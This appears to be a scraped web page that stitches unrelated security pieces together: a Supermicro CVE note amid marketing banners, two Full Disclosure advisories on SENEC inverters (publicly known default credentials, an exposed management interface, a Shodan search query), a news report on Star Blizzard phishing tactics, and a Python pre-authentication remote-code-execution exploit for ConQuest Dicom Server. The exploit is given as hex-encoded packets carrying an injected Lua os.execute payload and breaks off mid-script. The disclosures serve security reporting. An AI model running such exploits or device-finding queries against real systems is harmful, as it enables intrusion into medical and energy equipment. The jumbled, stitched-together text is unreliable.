A web server in the Intelligent Platform Management Interface (IPMI) baseboard management controller (BMC) implementation on Supermicro X11 and M11 based devices, with firmware versions up to 3.17.02, allows remote unauthenticated users to perform directory traversal, potentially disclosing sensitive information.

**Ultimate Building Blocks for Data Center Acceleration**

Construct Your Tailored AI Solutions from the Largest NVIDIA MGX™ Systems Portfolio

**Empowering the Future of Content Production**

Supermicro and AMD Solutions Help Studios and Filmmakers Bring Magic to Life

**Accelerate Everything AI**

Introducing GPU Acceleration for a Complete Range of Enterprise Workloads

**New Generation**

Supermicro’s 15+ Server Families Will Support the Upcoming 5th Gen Intel® Xeon® Processors (Formerly Codenamed Emerald Rapids)

**Webinar Accelerate Everything  
in the Data Center  
and at the Edge**

A conversation about fast cars and faster servers with Timothy Prickett Morgan, Supermicro, and Intel®

**Open Storage Summit ’23**

Developing storage solutions to meet the demands of AI, HPC and data-intensive workloads

Starting from August 15th

**Rack Scale Solutions**

Accelerated Time-To-Delivery of Plug and Play Racks with Proven Quality and Reliability

**SuperBlade®**

Highest Performance with Advanced Networking and NVMe

**Twin Family**

Enterprise Optimized Hyper-Converged Infrastructure

**5G, IoT & Edge Computing**

Connecting the Intelligent World from Devices to the Cloud

**GPU Systems**

AI / Deep Learning and HPC Optimized Servers

**All-Flash EDSFF Storage**

Cloud-Density Storage Systems Optimized For Software-Defined Data Centers

**A+ Solutions (AMD EPYC™)**

Broadest Portfolio Optimized to Deliver Superior Performance

**Building Blocks**

Industry’s broadest selection of high quality hardware for fully application optimized server, storage, embedded/IoT, and workstation solutions

**Made in Silicon Valley**

The Wall Street Journal Conversation with Charles Liang, Founder, President & CEO, Supermicro and Ramin Beheshti, Former Chief Product & Technology Officer, Dow Jones

Watch Video

**JumpStart: Free Bare Metal Access to Supermicro Servers with the latest Intel® and AMD™ Processors**

**COMPUTEX ’23 Keynote: Charles Liang with Special Guest Jensen Huang**

**Rakuten Symphony – Powered by Supermicro 5G Systems**

**Rack Scale Plug and Play Solutions from Supermicro**

**Supermicro 5G Edge Solutions Empowering the Deskless Workforce with Taqtile and Intel**

**Data Center Refresh and Expansion**

**How On-Premises Deployment Can Overcome Six Critical AI Challenges**

**Harness the Power of AI with Supermicro and NVIDIA Omniverse Enterprise**

**A Journey to Make High-End Cloud Gaming Faster, More Secure & More Accessible**

Click here to use Legacy Supermicro.com Site

CVE-2023-33411: Supermicro Data Center Server, Blade, Data Storage, AI System

The affected devices use publicly available default credentials with administrative privileges.

**Full Disclosure mailing list archives**

_From_: Phos4Me via Fulldisclosure <fulldisclosure () seclists org>  
_Date_: Fri, 10 Nov 2023 07:12:31 +0000  

> > Advisory ID: Ph0s-2023-004
> > Product: EnBw - SENEC legacy storage box: V1-V3
> > Manufacturer: SENEC - a part of EnBw
> > Affected Version(s): Firmware: all (as of 2023-06-19)
> > Tested Version(s): current
> > Vulnerability Type: CWE-1392: Use of Default Credentials

> > Risk Level:
> > CVSS v3.1 Vector:
> > AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)

> > Manufacturer Risk Level Rating:
> > AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:H/RL:U/RC:C
> > Overall CVSS Score: 8.6

> > Solution Status: Fixed
> > Manufacturer Notification: 2023-06-05
> > Public Disclosure: 2023-11-01
> > CVE Reference: CVE-2023-39170
> > Author of Advisory: Ph0s\[4\], R0ckE7

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Overview:
> > Foreword:
> > This vulnerability was reported to the enbw-cert. we would like to
> > thank enbw-cert for taking care of the vulns and patch the systems.
> > we decided to publish when most of the reported vulns are patched
> > to make sure nobody is harmed when 3rdparys exploit the mentioned vulns.

> > About Senec:
> > We are SENEC

> > We have been the EnBW energy independence experts since 2018 – but we have
> > put our heart and soul into guiding customers on the route to independence
> > since SENEC was founded in 2009. Our passion lies in actively promoting the
> > energy transition with innovative ideas and pioneering products. And,
> > because we don’t do things by halves, our unwavering ambition is to create
> > integrated solutions that enable you to enjoy the highest possible degree
> > of independence and sustainability through self-generation of solar
> > electricity.

> > About SENEC Home:

> > SENEC.Home: The smart electricity storage device for your home

> > SENEC.Home is the heart of the your sustainable, affordable supply of solar
> > electricity. The smart battery storage device stores excess electricity
> > generated by your PV system so that you can use it when you need it – such as
> > when your household’s energy consumption rises in the evening, or on rainy days
> > when your PV system generates less power.

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Vulnerability Details:

> > The credentials for the senec inverters are known in public.

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Proof of Concept (PoC):

> > The attack consists of the following steps:

> > 1\. use google to optain them, eg:
> > https://www.photovoltaikforum.com/thread/206930-senec-v3-hybrid-zugangsdaten/

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Solution:
> > Patched by Manufacturer
> > (Rolled out until September 11, 2023)

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Disclosure Timeline:

> > 2022-06-01: Vulnerability discovered
> > 2023-06-05: Vulnerability reported to manufacturer
> > 2023-09-11: Patch rollout by manufacturer to affected devices
> > 2023-11-01: Public disclosure of vulnerability

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Researcher:
> > Ph0s\[4\], R0ckE7

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Disclaimer:

> > The information provided in this security advisory is provided "as is"
> > and without warranty of any kind. Details of this security advisory may
> > be updated in order to provide as accurate information as possible.

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Copyright:

> > Creative Commons - Attribution (by) - Version 4.0
> > URL: https://creativecommons.org/licenses/by/4.0/deed.en
> > \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
> > Sent through the Full Disclosure mailing list
> > https://nmap.org/mailman/listinfo/fulldisclosure
> > Web Archives & RSS: https://seclists.org/fulldisclosure/

**Attachment: publickey - Phos4Me@proton.me - 0x3F4F673D.asc**  
_Description:_

**Attachment: signature.asc**  
_Description:_ OpenPGP digital signature

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Senec Inverters Home V1, V2, V3 Home & Hybrid Publicly Accessible Default Credentials- CVE-2023-39170** _Phos4Me via Fulldisclosure (Nov 12)_

CVE-2023-39169: Senec Inverters Home V1, V2, V3 Home & Hybrid Publicly Accessible Default Credentials- CVE-2023-39170

SENEC Storage Box V1,V2 and V3 accidentially expose a management UI accessible with publicly known admin credentials.

**Full Disclosure mailing list archives**

_From_: Phos4Me via Fulldisclosure <fulldisclosure () seclists org>  
_Date_: Fri, 10 Nov 2023 07:11:03 +0000  

> > Advisory ID: Ph0s-2023-005
> > Product: EnBw - SENEC legacy storage box: V1-V3
> > Manufacturer: SENEC - a part of EnBw
> > Affected Version(s): Firmware: all (as of 2023-06-19)
> > Tested Version(s): current
> > Vulnerability Type: CWE-923: Improper Restriction of Communication
> > Channel to Intended Endpoints

> > Risk Level:
> > CVSS v3.1 Vector:
> > AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L (7.4 High)

> > Manufacturer Risk Level Rating:
> > AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L/E:H/RL:T/RC:C
> > Overall CVSS Score: 7.2

> > Solution Status: Fixed
> > Manufacturer Notification: 2023-06-05
> > Public Disclosure: 2023-11-01
> > CVE Reference: CCVE-2023-39171
> > Author of Advisory: Ph0s\[4\], R0ckE7

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Overview:
> > Foreword:
> > This vulnerability was reported to the enbw-cert. we would like to
> > thank enbw-cert for taking care of the vulns and patch the systems.
> > we decided to publish when most of the reported vulns are patched
> > to make sure nobody is harmed when 3rdparys exploit the mentioned vulns.

> > About Senec:
> > We are SENEC

> > We have been the EnBW energy independence experts since 2018 – but we have
> > put our heart and soul into guiding customers on the route to independence
> > since SENEC was founded in 2009. Our passion lies in actively promoting the
> > energy transition with innovative ideas and pioneering products. And,
> > because we don’t do things by halves, our unwavering ambition is to create
> > integrated solutions that enable you to enjoy the highest possible degree
> > of independence and sustainability through self-generation of solar
> > electricity.

> > About SENEC Home:

> > SENEC.Home: The smart electricity storage device for your home

> > SENEC.Home is the heart of the your sustainable, affordable supply of solar
> > electricity. The smart battery storage device stores excess electricity
> > generated by your PV system so that you can use it when you need it – such as
> > when your household’s energy consumption rises in the evening, or on rainy days
> > when your PV system generates less power.

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Vulnerability Details:

> > The management interface of the SENEC.Inverter is publicly accessible via the
> > Internet. This circumstance is recommended by the manufacturer and customers are
> > advised to open the necessary ports to enable remote maintenance.
> > As a result, anyone who manages to detect and successfully exploit security
> > vulnerabilities in SENEC.Inverter, for instance the authors of this report, can
> > access and compromise all devices available on the internet without
> > restrictions. To achieve this,it is possible to use an IoT search engine such as
> > Shodan to automatically obtain an up-to-date list of IP addresses of all devices
> > in just a few seconds.

> > Besides Shodan, there are other IoT search engines such as Censys or ZoomEye to
> > complement the list even further.
> > Consequently, it is very easy for an attacker to develop an exploit script for
> > the automated compromise of all SENEC.Inverter devices, e.g. to simul-
> > taneously shut down all appliances or to damage them through a targeted
> > overload. For this purpose, only the hard-coded credentials previously
> > identified in findings CVE-2023-39168 and CVE-2023-39169 need to be used in
> > conjunction with SENEC.Inverter’s built-in API.

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Proof of Concept (PoC):

> > The attack consists of the following steps:

> > 1\. use the shodan dork to obtain management-interfaces.
> > (no longer valid, patched by manufacturer)

> > https://www.shodan.io/search?query=http.html%3A<title>SENEC<%2Ftitle%
> > 3E

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Solution:
> > Patched by Manufacturer
> > (Rolled out until September 11, 2023)

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Disclosure Timeline:

> > 2022-06-01: Vulnerability discovered
> > 2023-06-05: Vulnerability reported to manufacturer
> > 2023-09-11: Patch rollout by manufacturer to affected devices
> > 2023-11-01: Public disclosure of vulnerability

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Researcher:
> > Ph0s\[4\], R0ckE7

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Disclaimer:

> > The information provided in this security advisory is provided "as is"
> > and without warranty of any kind. Details of this security advisory may
> > be updated in order to provide as accurate information as possible.

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Copyright:

> > Creative Commons - Attribution (by) - Version 4.0
> > URL: https://creativecommons.org/licenses/by/4.0/deed.en
> > \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
> > Sent through the Full Disclosure mailing list
> > https://nmap.org/mailman/listinfo/fulldisclosure
> > Web Archives & RSS: https://seclists.org/fulldisclosure/

**Attachment: publickey - Phos4Me@proton.me - 0x3F4F673D.asc**  
_Description:_

**Attachment: signature.asc**  
_Description:_ OpenPGP digital signature

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Senec Inverters Home V1, V2, V3 Home & Hybrid Publicly Accessible Management Interface “Local GUI”- CVE-2023-39171** _Phos4Me via Fulldisclosure (Nov 12)_

CVE-2023-39171: Senec Inverters Home V1, V2, V3 Home & Hybrid Publicly Accessible Management Interface “Local GUI”- CVE-2023-39171

The threat actor known as COLDRIVER has continued to engage in credential theft activities against entities that are of strategic interests to Russia while simultaneously improving its detection evasion capabilities.
The Microsoft Threat Intelligence team is tracking under the cluster as Star Blizzard (formerly SEABORGIUM). It's also called Blue Callisto, BlueCharlie (or TAG-53),

Threat Intelligence / Cyber Espionage

The threat actor known as COLDRIVER has continued to engage in credential theft activities against entities that are of strategic interests to Russia while simultaneously improving its detection evasion capabilities.

The Microsoft Threat Intelligence team is tracking under the cluster as **Star Blizzard** (formerly SEABORGIUM). It's also called Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), and TA446.

The adversary "continues to prolifically target individuals and organizations involved in international affairs, defense, and logistics support to Ukraine, as well as academia, information security companies, and other entities aligning with Russian state interests," Redmond said.

Star Blizzard, linked to Russia's Federal Security Service (FSB), has a track record of setting up lookalike domains that impersonate the login pages of targeted companies. It's known to be active since at least 2017.

UPCOMING WEBINAR

Cracking the Code: Learn How Cyber Attackers Exploit Human Psychology

Ever wondered why social engineering is so effective? Dive deep into the psychology of cyber attackers in our upcoming webinar.

Join Now

In August 2023, Recorded Future revealed 94 new domains that are part of the threat actor's attack infrastructure, most of which feature keywords related to information technology and cryptocurrency.

Microsoft said it observed the adversary leveraging server-side scripts to prevent automated scanning of the actor-controlled infrastructure starting April 2023, moving away from hCaptcha to determine targets of interest and redirecting the browsing session to the Evilginx server.

The server-side JavaScript code is designed to check if the browser has any plugins installed, if the page is being accessed by an automation tool like Selenium or PhantomJS, and transmit the results to the server in the form of a HTTP POST request.

"Following the POST request, the redirector server assesses the data collected from the browser and decides whether to allow continued browser redirection," Microsoft said.

"When a good verdict is reached, the browser receives a response from the redirection server, redirecting to the next stage of the chain, which is either an hCaptcha for the user to solve, or direct to the Evilginx server."

Also newly used by Star Blizzard are email marketing services like HubSpot and MailerLite to craft campaigns that serve as the starting point of the redirection chain that culminates at the Evilginx server hosting the credential harvesting page.

In addition, the threat actor has been observed using a domain name service (DNS) provider to resolve actor-registered domain infrastructure, sending password-protected PDF lures embedding the links to evade email security processes as well as host the files on Proton Drive.

That's not all. In a sign that the threat actor is actively keeping tabs on public reporting into its tactics and techniques, it has now upgraded its domain generation algorithm (DGA) to include a more randomized list of words when naming them.

Despite these changes, "Star Blizzard activities remain focused on email credential theft, predominantly targeting cloud-based email providers that host organizational and/or personal email accounts," Microsoft said.

"Star Blizzard remains constant in their use of pairs of dedicated VPSs to host actor-controlled infrastructure (redirector + Evilginx servers) used for spear-phishing activities, where each server usually hosts a separate actor registered domain."

**U.K. Sanctions Two Members of Star Blizzard**

The development comes as the U.K. called out Star Blizzard for "sustained unsuccessful attempts to interfere in U.K. political processes" by targeting high-profile individuals and entities through cyber operations.

Besides linking Star Blizzard to Centre 18, a subordinate element within FSB, the U.K. government sanctioned two members of the hacking crew – Ruslan Aleksandrovich Peretyatko and Andrey Stanislavovich Korinets (aka Alexey Doguzhiev) – for their involvement in the spear-phishing campaigns.

The activity "resulted in unauthorized access and exfiltration of sensitive data, which was intended to undermine UK organizations and more broadly, the UK government," it said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Warns of COLDRIVER's Evolving Evading and Credential-Stealing Tactics

Conquest Dicom Server version 1.5.0d pre-authentication remote command execution exploit.

#!/usr/bin/env python3  
# ---------------------------------------------------------  
# preauth rce poc for ConQuest Dicom Server (1.5.0d)  
# ---------------------------------------------------------  
# 04.08.2023 @ 22:07   
#   
#   code610 blogspot com  
# 

import socket

target = '192.168.56.106'  
rport = 5678

pkt1 =  b"\x01\x00\x00\x00\x00\xd0\x00\x01\x00\x00\x43\x4f\x4e\x51\x55\x45\x53\x54\x56\x31"  
pkt1 += b"\x20\x20\x20\x20\x20\x20\x43\x4f\x4e\x51\x55\x45\x53\x54\x56\x31\x20\x20\x20\x20"  
pkt1 += b"\x20\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
pkt1 += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
pkt1 += b"\x10\x00\x00\x15\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x33\x2e\x31\x2e\x31\x2e\x31"  
pkt1 += b"\x20\x00\x00\x2e\xcb\x00\x00\x00\x30\x00\x00\x11\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e\x31"  
pkt1 += b"\x40\x00\x00\x11\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e\x32"  
pkt1 += b"\x50\x00\x00\x3d"  
pkt1 += b"\x51\x00\x00\x04\x00\x00\x80\x00"  
pkt1 += b"\x52\x00\x00\x22\x31\x2e\x32\x2e\x38\x32\x36\x2e\x30\x2e\x31\x2e\x33\x36\x38\x30\x30\x34\x33\x2e\x32\x2e\x31\x33\x35\x2e\x31\x30\x36\x36\x2e\x31\x30\x31"  
pkt1 += b"\x55\x00\x00\x0b\x31\x2e\x35\x2e\x30\x2f\x57\x49\x4e\x33\x32"

pkt2 = b"\x04\x00\x00\x00\x04\x92\x00\x00\x04\x8e\xcb\x03\x00\x00\x00\x00\x04\x00\x00\x00\x38\x00\x00\x00"  
pkt2 += b"\x00\x00\x02\x00\x12\x00\x00\x00\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e"  
pkt2 += b"\x31\x00\x00\x00\x00\x01\x02\x00\x00\x00\x30\x00\x00\x00\x10\x01\x02\x00\x00\x00\x07\x00\x00\x00"  
pkt2 += b"\x00\x08\x02\x00\x00\x00\x01\x01\x99\x99\x00\x04\x40\x04\x00\x00\x6c\x75\x61\x3a\x6c\x6f\x63\x61"  
pkt2 += b"\x6c\x20\x66\x69\x72\x73\x74\x3d\x74\x72\x75\x65\x3b\x20\x6c\x6f\x63\x61\x6c\x20\x61\x65\x3d\x5b"  
pkt2 += b"\x5b\x43\x4f\x4e\x51\x55\x45\x53\x54\x56\x31\x5d\x5d\x3b\x6c\x6f\x63\x61\x6c\x20\x6c\x65\x76\x65"  
pkt2 += b"\x6c\x3d\x5b\x5b\x50\x41\x54\x49\x45\x4e\x54\x5d\x5d\x3b\x6c\x6f\x63\x61\x6c\x20\x71\x3d\x7b\x51"  
pkt2 += b"\x75\x65\x72\x79\x52\x65\x74\x72\x69\x65\x76\x65\x4c\x65\x76\x65\x6c\x3d\x5b\x5b\x50\x41\x54\x49"  
pkt2 += b"\x45\x4e\x54\x5d\x5d\x2c\x50\x61\x74\x69\x65\x6e\x74\x49\x44\x3d\x5b\x5b\x5d\x5d\x2c\x50\x61\x74"  
pkt2 += b"\x69\x65\x6e\x74\x4e\x61\x6d\x65\x3d\x5b\x5b"

# super evil command  
# rce payload: aaaa]],};local t=os.execute("calc");local z{[[  
pkt3 = b""  
pkt3 += b"\x61\x61\x61\x61\x5d\x5d\x2c\x7d\x3b\x6c\x6f\x63\x61\x6c\x20\x74\x3d\x6f\x73\x2e\x65\x78\x65\x63"  
pkt3 += b"\x75\x74\x65\x28\x22\x63\x61\x6c\x63\x22\x29\x3b\x6c\x6f\x63\x61\x6c\x20\x20\x41\x3d\x7b\x5b\x5b\x41\x42"

pkt4 = b"\x5d\x5d\x2c\x7d\x3b\x6c\x6f\x63\x61\x6c\x20\x71\x32\x3d\x44\x69\x63\x6f\x6d\x4f\x62\x6a\x65\x63\x74\x3a\x6e\x65\x77\x28\x29\x3b"  
pkt4 += b"\x20\x66\x6f\x72\x20\x6b\x2c\x76\x20\x69\x6e\x20\x70\x61\x69\x72\x73\x28\x71\x29\x20\x64\x6f\x20\x71\x32\x5b\x6b\x5d\x3d\x76\x20"  
pkt4 += b"\x65\x6e\x64\x3b\x6c\x6f\x63\x61\x6c\x20\x72\x32\x3d\x64\x69\x63\x6f\x6d\x71\x75\x65\x72\x79\x28\x61\x65\x2c\x20\x6c\x65\x76\x65"  
pkt4 += b"\x6c\x2c\x20\x71\x32\x29\x3b\x6c\x6f\x63\x61\x6c\x20\x73\x3d\x74\x65\x6d\x70\x66\x69\x6c\x65\x28\x22\x74\x78\x74\x22\x29\x20\x66"  
pkt4 += b"\x3d\x69\x6f\x2e\x6f\x70\x65\x6e\x28\x73\x2c\x20\x22\x77\x62\x22\x29\x3b\x69\x66\x20\x72\x32\x3d\x3d\x6e\x69\x6c\x20\x74\x68\x65"  
pkt4 += b"\x6e\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x6e\x6f\x20\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x20\x77\x69\x74\x68\x20\x22\x2e"  
pkt4 += b"\x2e\x61\x65\x2e\x2e\x22\x5c\x6e\x22\x29\x20\x72\x65\x74\x75\x72\x6e\x66\x69\x6c\x65\x3d\x73\x20\x66\x3a\x63\x6c\x6f\x73\x65\x28"  
pkt4 += b"\x29\x20\x72\x65\x74\x75\x72\x6e\x20\x65\x6e\x64\x3b\x20\x6c\x6f\x63\x61\x6c\x20\x72\x20\x3d\x20\x6c\x6f\x61\x64\x73\x74\x72\x69"  
pkt4 += b"\x6e\x67\x28\x22\x72\x65\x74\x75\x72\x6e\x20\x22\x2e\x2e\x72\x32\x3a\x53\x65\x72\x69\x61\x6c\x69\x7a\x65\x28\x29\x29\x28\x29\x3b"  
pkt4 += b"\x72\x5b\x31\x5d\x2e\x51\x75\x65\x72\x79\x52\x65\x74\x72\x69\x65\x76\x65\x4c\x65\x76\x65\x6c\x3d\x6e\x69\x6c\x3b\x20\x72\x5b\x31"  
pkt4 += b"\x5d\x2e\x54\x72\x61\x6e\x73\x66\x65\x72\x53\x79\x6e\x74\x61\x78\x55\x49\x44\x3d\x6e\x69\x6c\x3b\x20\x6c\x6f\x63\x61\x6c\x20\x6b"  
pkt4 += b"\x65\x79\x73\x3d\x7b\x7d\x20\x66\x6f\x72\x20\x6b\x2c\x76\x20\x69\x6e\x20\x70\x61\x69\x72\x73\x28\x72\x5b\x31\x5d\x29\x20\x64\x6f"

pkt5 = b""  
pkt5 += b"\x20\x69\x66\x20\x74\x79\x70\x65\x28\x76\x29\x7e\x3d\x22\x74\x61\x62\x6c\x65\x22\x20\x74\x68\x65\x6e\x20\x6b\x65\x79\x73\x5b\x23"  
pkt5 += b"\x6b\x65\x79\x73\x2b\x31\x5d\x3d\x6b\x20\x65\x6e\x64\x20\x65\x6e\x64\x3b\x20\x74\x61\x62\x6c\x65\x2e\x73\x6f\x72\x74\x28\x6b\x65"  
pkt5 += b"\x79\x73\x2c\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x61\x2c\x20\x62\x29\x20\x72\x65\x74\x75\x72\x6e\x20\x73\x74\x72\x69\x6e\x67"  
pkt5 += b"\x2e\x73\x75\x62\x28\x61\x2c\x20\x31\x2c\x20\x37\x29\x3c\x73\x74\x72\x69\x6e\x67\x2e\x73\x75\x62\x28\x62\x2c\x20\x31\x2c\x20\x37"  
pkt5 += b"\x29\x20\x65\x6e\x64\x29\x3b\x20\x69\x66\x20\x66\x69\x72\x73\x74\x20\x74\x68\x65\x6e\x20\x66\x6f\x72\x20\x6b\x2c\x76\x20\x69\x6e"  
pkt5 += b"\x20\x69\x70\x61\x69\x72\x73\x28\x6b\x65\x79\x73\x29\x20\x64\x6f\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x76\x2e\x2e\x22\x20\x20\x20"  
pkt5 += b"\x20\x22\x29\x20\x65\x6e\x64\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x5c\x6e\x22\x29\x20\x65\x6e\x64\x20\x69\x66\x20\x66\x69\x72"  
pkt5 += b"\x73\x74\x20\x74\x68\x65\x6e\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"  
pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"  
pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"  
pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"  
pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"  
pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5c\x6e\x22\x29\x20\x65\x6e\x64\x20\x66\x6f\x72\x20\x6b\x2c\x76"  
pkt5 += b"\x20\x69\x6e\x20\x69\x70\x61\x69\x72\x73\x28\x72\x29\x20\x64\x6f\x20\x20\x20\x66\x6f\x72\x20\x6b\x32\x2c\x76\x32\x20\x69\x6e\x20"  
pkt5 += b"\x69\x70\x61\x69\x72\x73\x28\x6b\x65\x79\x73\x29\x20\x64\x6f\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x5b\x22\x2e\x2e\x76\x5b\x76"  
pkt5 += b"\x32\x5d\x2e\x2e\x22\x5d\x20\x20\x20\x20\x22\x29\x20\x65\x6e\x64\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x5c\x6e\x22\x29\x20\x65"  
pkt5 += b"\x6e\x64\x20\x72\x65\x74\x75\x72\x6e\x66\x69\x6c\x65\x3d\x73\x20\x66\x3a\x63\x6c\x6f\x73\x65\x28\x29\x3b"

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:  
    print("+ connecting to target...")  
    s.connect(( target, rport ))  
    print("+ connected!")

    print("+ sending pkt1...")  
    #s.sendall( pkt1 )   
    #data1 = s.recv(1024)  
    #print("+ recv pkt1:\n%s" % data1)

    #print("Data received:\n%s" % data1 )

    print("+ sending 2nd and more pkts...")  
    #s.sendall( pkt2 )   
    #s.sendall( pkt3 )   
    #s.sendall( pkt3 )   
